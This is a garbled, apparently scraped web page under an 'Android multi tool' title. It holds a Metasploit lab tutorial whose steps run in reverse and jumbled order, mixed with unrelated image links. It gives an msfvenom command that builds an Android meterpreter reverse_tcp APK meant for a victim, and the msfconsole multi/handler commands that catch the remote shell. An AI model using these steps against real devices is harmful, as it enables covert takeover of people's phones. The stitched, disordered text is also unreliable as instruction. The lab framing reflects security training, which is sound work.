Verify that Android SDK Android virtual device is checked in like the screenshot below. Open the setup file named Android-Studio-bundle-xxxxx-windows and proceed with the installation process. Open a VM (preferably Windows OS) and install Android studio from Step 2: To perform this exploit, we need to have an emulator ready where we would be sharing the apk. Advanced attacks can be pursued by binding these files with legitimate APKs, which is beyond the scope of this lab.
Android multi tool v 1.0 apk#
Open a new terminal and type the above command to generate an apk file which will be distributed to the victim. Open a new terminal.Ĭommand: msfvenom –p Android/meterpreter/reverse_tcp LHOST=ip_address LPORT=port_number –R > filename.apk Once you type exploit, your listener should be up and running waiting for an incoming wildcard connection. We can use the command ‘show options’ to see the various inputs an exploit takes for running successfully. In this case, we will search for the Android meterpreter payload.Ĭommand: msf> set payload Android/meterpreter/reverse_tcpĪlong with ‘use’ and ‘search’ commands, ‘set’ is another command used in Metasploit to set a particular payload for an exploit. You can use the ‘search’ command within msfconsole to search for a keyword. In this case, we wish to use the multi/handler exploit, which facilitates listening to an incoming wildcard connection. In Metasploit, use command uses a particular model of the framework. Once you verify and note down the IP address, we shall open the MSF console to create a listener for our exploit. We will be using this IP address in our exploit.
![android multi tool v 1.0 android multi tool v 1.0](https://otechworld.com/wp-content/uploads/2018/02/Open-Android-Multi-Tools-exe.gif)
Open the terminal in the Kali Linux, and note down the IP address of the system.
![android multi tool v 1.0 android multi tool v 1.0](https://upload.wikimedia.org/wikipedia/commons/thumb/3/31/Android_robot_head.svg/1200px-Android_robot_head.svg.png)
Verify the IP address of the Kali machine. Login to the Kali Linux virtual machine using the default credentials given above. Open Kali Linux OS on Oracle VM VirtualBox. Creating an APK and initiating a multi/handler exploit Step 1: